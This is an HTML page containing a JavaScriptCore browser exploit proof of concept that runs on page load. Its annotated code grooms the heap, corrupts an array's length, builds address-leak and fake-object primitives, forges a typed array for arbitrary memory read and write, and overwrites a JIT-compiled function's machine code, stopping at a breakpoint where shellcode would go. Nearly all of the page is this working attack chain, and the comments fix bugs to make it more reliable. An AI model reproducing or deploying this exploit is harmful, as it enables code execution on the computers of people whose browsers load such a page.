<html>
<head>
<script>
// Debugging aid left by the author (an lldb breakpoint used while developing this PoC):
// b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218
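// Shared exploit state. Declared explicitly: the original relied on implicit
// globals, which throw under strict mode / ES modules and are easy to clobber.
let big_array = [];             // JSArray whose length gets corrupted; replaced in make_a_big_hole()
let debug = 0;                  // gates debug_alert()
const arr = [];                 // keeps the ArrayBuffers allocated by gc() alive
let evil_buffer = {};           // not referenced anywhere else in this file; kept for compatibility
let bigarray_buffer_index = 0;  // index into big_array that aliases one sprayed Float64Array (set in trigger)
let buffer_arr_index = 0;       // which entry of buffer_arr that alias belongs to (set in trigger)
let function_to_shellcode = {}; // JIT-compiled function whose code page trigger() patches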
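// Debug logger: appends one <div> per message to the <pre id="d"> sink in the body.
// Uses textContent rather than innerHTML so the logged text is never parsed as
// markup, and looks the element up by id instead of relying on the implicit
// window.d named-element global.
function log(txt) {
  const line = document.createElement("div");
  line.textContent = "log: " + txt;
  document.getElementById("d").appendChild(line);
}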
// Conditional checkpoint: when the global `debug` flag is truthy, show `str` in
// a (blocking) alert and also append it to the on-page log. Otherwise a no-op.
function debug_alert(str){
  if (!debug) {
    return;
  }
  alert(str);
  log(str);
}
// Allocation-pressure loop, presumably meant to provoke a full garbage
// collection (hence the name): ~0x924924 twenty-byte ArrayBuffers (~190 MB of
// backing store, plus wrappers) are created and kept alive through the global
// `arr`. The trailing numbers in the comments are earlier values of the two
// constants. `i` is an implicit global here and is reused by other functions.
function gc() {
debug_alert("gc");
for(i = 0;i < 0x924924;i++){ //0x4924924
arr[i] = new ArrayBuffer(20); //54
}
debug_alert("gcc");
}
// Alternative pressure routine using canvas ImageData: 100 images of
// 1 x (0x10000/4) pixels, i.e. 0x10000 bytes each at 4 bytes per pixel.
// Not called anywhere in this file. Errors are deliberately swallowed so a
// missing canvas context cannot abort the run. Despite the name `gl`, this is
// the "2d" context, not WebGL.
function gc2() {
try {
var c = document.createElement("canvas");
var gl = c.getContext("2d");
for (var i = 0; i < 100; i++) {
var gggg = gl.createImageData(1, 0x10000/4)
}
} catch (e) {
}
}
// Heap grooming for the target array. Builds a ~2 GB string `gg`, derives five
// huge strings from it, frees three of them to leave gaps ("the hole"), then
// allocates the 0x10000000-element double array that becomes `big_array`,
// presumably so its storage lands in that gap. `g`, `gg`, `init_big_array_len`
// and `big_array` are all globals; trigger() reads init_big_array_len to detect
// that big_array.length was corrupted.
function make_a_big_hole(){
g = []
// 0x7fff1000 one-byte characters: close to the 2 GB string-length limit.
gg = "g".repeat(0x7fff1000)
debug_alert("big_hole");
// fontsize() wraps gg in <font size="5">...</font>, producing five new huge strings.
for(var i = 0; i < 5;i++){
g[i] = String.prototype.fontsize.call(gg,5);
}
debug_alert("after_big_hole");
// Drop g[0], g[2], g[3] (g[1] and g[4] stay alive). The assignments are
// idempotent; the 3x repetition is kept as the author wrote it.
for(var i = 0; i < 0x3;i++){
g[0] = null; //gc
//g[1] = null;
g[2] = null; //".replace
g[3] = null; //hole
}
//g = null;
debug_alert("big_array");
// 0x10000000 doubles = 2 GiB of element storage, filled so it is a double array.
init_big_array_len = 0x10000000;
g[2] = new Array(init_big_array_len);
g[2].fill(1.1);
debug_alert("after_big_array");
big_array = g[2];
//evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0));
//arr2 = []; arr2[0] = evil_float64;
//heap_feng_shui();
// Release the base string and apply allocation pressure (see gc()).
gg = null;
gc();
}
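// Builds one 0x1000-byte (0x800 UTF-16 unit) spray unit. Byte layout:
//   [0x00, 0x8e)   zeros
//   [0x8e, 0x96)   ff ff ff ff ff ff ff ff
//   [0x96, 0x9e)   00 00 00 00 00 00 00 00
//   [0x9e, 0xa6)   ff ff ff ff ff ff ff ff
//   [0xa6, 0x1000) zeros
// trigger() repeats the result 0x7fff0000/0x800 times, so the 0x800 length is
// load-bearing. What the ff/00/ff words are meant to overwrite is not stated in
// this file — presumably length/capacity-style words of the object that gets
// sprayed over; confirm against the target. String.fromCharCode replaces the
// deprecated unescape() call and yields the same code units.
function make_evil_data(){
  const offset = 0x38 + 0x1e + 0x38;                     // 0x8e bytes of leading zeros
  const allOnes = String.fromCharCode(0xffff).repeat(4); // 8 bytes of 0xff
  const zeros8 = "\x00".repeat(4);                       // 8 bytes of 0x00
  const head = "\x00".repeat(offset / 2);
  const tail = "\x00".repeat((0x1000 - offset - 0x18) / 2);
  return head + allOnes + zeros8 + allOnes + tail;
}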
// Sprays 0x18000 Float64Arrays, each over a fresh 0x8000-byte ArrayBuffer
// (0x1000 doubles) filled with 1.1, and keeps them in the global `buffer_arr`
// (read later by read_obj, fake_obj and trigger). `arr2` is assigned but unused;
// the block comment below is an earlier variant.
// Why 1.1: trigger() scans the corrupted big_array for 1.0375. Reading the raw
// bits of 1.1 (0x3FF199999999999A) back as a JSValue double yields
// 0x3FF099999999999A = 1.0375, i.e. the two differ by 2^48 — consistent with
// JSC's NaN-boxing, which offsets stored doubles by that amount.
function heap_feng_shui(){
debug_alert("heap_feng_shui");
arr2 = []
buffer_arr = []
/* for(var i = 0;i < 20;i++){
//arr2[i] = new Array(0x1000);
buffer_arr[i] = new Float64Array(0x2000001);
// buffer_arr[i].fill(1.1); //float64 1.1 == array 1.0375
}*/
for(var i = 0;i < 0x18000;i++){
evil_float64 = new Float64Array(new ArrayBuffer(0x8000));
evil_float64.fill(1.1);
buffer_arr[i] = evil_float64;
}
debug_alert("after_heap_feng_shui");
}
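// Splits a double into its raw IEEE-754 bit pattern as [low32, high32] in host
// byte order (little-endian on the targets this PoC is written for). Inverse
// of u32tof64. Uses locals: the original leaked `a`, `b` and `result` as
// implicit globals, and `a` is also the name trigger() uses for its spray
// string. Scratch size kept at 8 doubles as in the original.
function f64tou32(number){
  const f64 = new Float64Array(0x8);
  f64.fill(number);
  const u32 = new Uint32Array(f64.buffer);
  return [u32[0], u32[1]];
}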
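// Reassembles a double from its [low32, high32] bit pattern (host byte order).
// Inverse of f64tou32. Stores into the Uint32Array are ToUint32-truncated,
// exactly as in the original. Uses locals instead of the implicit globals
// `a` and `b`.
function u32tof64(arr){
  const u32 = new Uint32Array(0x8);
  u32[0] = arr[0];
  u32[1] = arr[1];
  return new Float64Array(u32.buffer)[0];
}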
// addrof primitive. big_array[bigarray_buffer_index] and
// buffer_arr[buffer_arr_index][0x50/8] refer to the same 8 bytes (the alias
// located by the scan in trigger()). Storing `obj` through the JSArray writes
// its JSValue; reading the slot back through the Float64Array yields the raw
// bits, which f64tou32 splits into [low32, high32]. Callers use that pair
// directly as the object's address. `f64_address` and `uint32` are implicit globals.
function read_obj(obj){
big_array[bigarray_buffer_index] = obj;
f64_address = buffer_arr[buffer_arr_index][0x50/8];
uint32 = f64tou32(f64_address);
// alert(uint32[1].toString(16)+ " " + uint32[0].toString(16));
return uint32;
//alert(uint32[1].toString(16)+ " " + uint32[0].toString(16));
}
// fakeobj primitive, the inverse of read_obj: write the [low32, high32]
// address as raw bits through the Float64Array alias, then read the same slot
// back through big_array, which interprets those bits as a JSValue (an object
// pointer). Returns whatever object the engine now believes lives at that address.
function fake_obj(arr_address){
f64_address = u32tof64(arr_address);
// alert(f64_address);
buffer_arr[buffer_arr_index][0x50/8] = f64_address;
// alert("here");
return big_array[bigarray_buffer_index];
}
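// Returns 8 pseudo-random characters drawn from "abcdefghijklmnopq". Only used
// to mint throwaway property names in sprayFloat64ArrayStru, so Math.random is
// adequate (nothing here needs unpredictability). Uses locals instead of the
// original's implicit globals (chars, maxPos, result, i).
function randomString(){
  const chars = "abcdefghijklmnopq";
  let result = "";
  for (let k = 0; k < 0x8; k++) {
    result += chars.charAt(Math.floor(Math.random() * chars.length));
  }
  return result;
}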
// Structure spray: creates 0x1000 one-element Float64Arrays, each given a
// differently named property, so that (presumably) each ends up with its own
// Structure / structure ID. trigger() later brute-forces cell-header values
// starting at structure ID 0x1000 until its forged object passes
// `instanceof Float64Array`; this spray is what is meant to make that succeed.
function sprayFloat64ArrayStru(){
for(var i = 0; i < 0x1000;i++){
var a = new Float64Array(1);
a[randomString()] = 1337;
}
}
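// Builds a double whose 64-bit pattern is (arr[1]:arr[0]) minus 2^48, i.e. the
// high word minus 0x10000 (a negative high word wraps mod 2^32 inside u32tof64).
// When that double is stored as a JSValue its in-memory bits equal the requested
// pair — presumably relying on JSC's NaN-boxing, which offsets stored doubles by
// 2^48 (the same effect that makes a sprayed 1.1 read back as 1.0375). Used by
// trigger() to forge the cell header and length/flags words of a fake object.
// Uses locals instead of the original's implicit globals (uint32, f).
function Int64(arr){
  const words = [arr[0], arr[1] - 0x10000];
  return u32tof64(words);
}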
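// In-place 64-bit add of a non-negative `num` to a [low32, high32] pair;
// returns the same array. The original added to the low word only, so a sum
// crossing 0xffffffff silently lost its carry (u32tof64 truncates each word mod
// 2^32). The carry is now propagated into the high word, which itself wraps at
// 32 bits.
function Int64_add(arr,num){
  const low = arr[0] + num;
  arr[0] = low >>> 0;
  arr[1] = (arr[1] + Math.floor(low / 0x100000000)) >>> 0;
  return arr;
}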
// Arbitrary 64-bit read. `fakearray` is the forged Float64Array from trigger()
// whose backing vector is the evil_buffer_array cell itself (container.vector),
// so fakearray[2] — 0x10 bytes into that cell, the third 8-byte field, the slot
// `container` labels `vector` — overlays evil_buffer_array's own data pointer.
// Pointing it at `addr` makes evil_buffer_array[0..1] read the two 32-bit words
// there. Returns [low32, high32], the same order f64tou32 uses, so the result
// can be fed straight back into Int64_add / read_64. `f` and `result` are
// implicit globals.
function read_64(addr){
f = u32tof64(addr);
fakearray[0x2] = f;
result = [];
result[0] = evil_buffer_array[0];
result[1] = evil_buffer_array[1];
//alert(result[1].toString(16)+ " " + result[0].toString(16));
return result;
}
// Arbitrary 32-bit write, same mechanism as read_64: retarget
// evil_buffer_array's data pointer at `addr` via fakearray[2], then store
// `data` (ToUint32-truncated) as its element 0. Only the low 4 bytes at `addr`
// are written. `f` is an implicit global.
function write_32(addr,data){
f = u32tof64(addr);
fakearray[0x2] = f;
evil_buffer_array[0] = data;
}
// Builds the global `function_to_shellcode` — body `eval('');abc = [];` followed
// by 500 `abc[k];` reads — via new Function (acceptable here: the source is a
// constant, not external input) and calls it 100 times, presumably so JSC
// compiles it to native code. trigger() later walks from the function object
// to its JIT code and patches that code. `func_body` and `i` are implicit
// globals, and `abc` is an implicit global inside the generated function.
function make_jit_function(){
func_body = "eval('');abc = [];"
for(i = 0;i<500;i++){
func_body += "abc[" + i.toString() + "];"
}
function_to_shellcode = new Function("a",func_body);
// alert("here")
for(i = 0;i < 100; i++){
function_to_shellcode();
}
// alert("here")
}
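// Entry point (body onload). Stages:
//  1. build the ~2 GB string spray (`a`, `z`, `x`), then the hole + big_array;
//  2. String.prototype.link over the spray, then heap_feng_shui();
//  3. the two slice() calls are the trigger — afterwards big_array.length is
//     expected to differ from init_big_array_len (length corruption);
//  4. scan the out-of-bounds region for a sprayed Float64Array (1.1 reads back
//     as 1.0375 through the array), giving the addrof/fakeobj alias pair;
//  5. forge a Float64Array over `container`'s inline properties, brute-force a
//     structure ID that passes instanceof, then read/write through it;
//  6. patch function_to_shellcode's JIT code with 0xcccccccc (four int3 bytes)
//     and call it — the PoC stops at the breakpoint; no shellcode is placed.
// Offsets (0x50, 0x10, 0x18, 0x20) and the 0x11827000 cell-header word are
// specific to the targeted JavaScriptCore build.
// Fixes vs. the original: the structure-ID loop reset `i = 1` on every pass, so
// it only ever tried 0x1001 and spun forever on a miss; `i` is now initialised
// once, incremented, and bounded. Each reload() path also returns, so the
// corrupted-memory path is not run on a known failure.
function trigger() {
  //alert(2);
  // make_jit_function();
  evil_data = make_evil_data();
  a = evil_data.repeat(0x7fff0000/0x800); // evil_data.length is 0x800 UTF-16 units
  z = a.slice(1);
  x = "\"".repeat(0x2aaaaaa0);
  //alert("1");
  // alert(evil_data.length.toString(16));
  make_a_big_hole();
  z = String.prototype.link.call(a,x)
  alert("The Array length is 0x" + big_array.length.toString(16));
  heap_feng_shui();
  //z = null;
  //a = null;
  //x = null;
  // heap_feng_shui();
  //alert("end");
  //Array.prototype.slice.call(arr,1);
  //Array.prototype.slice.call(buffer_arr,1);
  // The trigger: slice past the original length, then slice the spray array.
  t = Array.prototype.slice.call(big_array,0x10000001,0x10000002);
  t = Array.prototype.slice.call(buffer_arr,1,2);
  if(big_array.length != init_big_array_len){
    // alert("Success!The Array length is 0x" + big_array.length.toString(16));
    // alert(big_array[0x1]);
    /*for(var i = 0x10000000;i < big_array.length;i++){
    if(big_array[i] != undefined && big_array[i] != -1){
    alert(i.toString(16));
    alert(big_array[i]);
    }
    }*/
    flag = 0;
    // Scan beyond the real length for a slot holding a sprayed 1.1 (seen as
    // 1.0375 through the JSArray). Write a marker through the array and find
    // which Float64Array in buffer_arr observed the change: that pair
    // (bigarray_buffer_index, buffer_arr_index) is the alias used by
    // read_obj/fake_obj.
    for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){ //0x4a000000
      //alert(i.toString(16));
      if(big_array[i] == 1.0375){
        alert("find Success");
        bigarray_buffer_index = i;
        big_array[bigarray_buffer_index] = 3.3333333;
        j = 0;
        while(j<0x18000){
          if(buffer_arr[j][0x50/8] != 1.1){
            buffer_arr_index = j;
            flag = 1;
            break;
          }
          j++;
        }
        break;
      }
    }
    if(flag == 0){
      alert("can't find buffer!");
      window.location.reload();
      return;
    }
  }
  else{
    alert("can't overwrite the length!");
    window.location.reload();
    return;
  }
  //alert(buffer_arr_index);
  make_jit_function();
  sprayFloat64ArrayStru();
  // Backing view for read_64/write_32; its data pointer is retargeted through fakearray[2].
  evil_buffer_array = new Uint32Array(0x1000);
  // Fake Float64Array laid out in container's inline properties: cell header,
  // butterfly, vector (the evil_buffer_array cell), length 0x10 / flags 0.
  var jsCellHeader = Int64([0x00001000,0x11827000]);
  var lengthFlags = Int64([0x00000010,0x00010000]);
  var container = {
    jsCell : jsCellHeader,
    butterfly : false,
    vector : evil_buffer_array,
    lengthAndFlags : lengthFlags
  };
  // Inline property storage starts 0x10 bytes into the object on this build.
  address = Int64_add(read_obj(container),0x10);
  //alert(address[1].toString(16) + " " + address[0].toString(16));
  fakearray = fake_obj(address);
  //String.prototype.link.call(container);
  // Brute-force the structure ID in the forged header until the fake object is
  // recognised as a Float64Array (sprayFloat64ArrayStru made 0x1000 candidates).
  // The bound is a guess to avoid spinning forever; tune it if the spray lands higher.
  i = 1;
  while(!(fakearray instanceof Float64Array)){
    jsCellHeader = Int64([0x00001000+i,0x11827000]);
    container.jsCell = jsCellHeader;
    i++;
    if(i > 0x10000){
      alert("can't find a Float64Array structure!");
      window.location.reload();
      return;
    }
  }
  //String.prototype.link.call(fakearray);
  // JSFunction -> executable -> JIT code -> code pointer (build-specific offsets).
  func_addr = read_obj(function_to_shellcode);
  // alert(func_addr[1].toString(16)+ " " + func_addr[0].toString(16));
  executableAddr = read_64(Int64_add(func_addr,0x18));
  jitCodeAddr = read_64(Int64_add(executableAddr,0x18));
  codeAddr = read_64(Int64_add(jitCodeAddr,0x20));
  // Four int3 bytes: calling the function now traps, proving control of the code page.
  write_32(codeAddr,0xcccccccc);
  //codeAddr = read_64(Int64_add(jitCodeAddr,0x10));
  //write_32(codeAddr,0xcccccccc);
  alert("begin_shellcode!!!!!!");
  function_to_shellcode();
  alert("end");
}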
</script>
</head>
<body onload="trigger()">
<pre id="d">
</pre>
</body>
</html>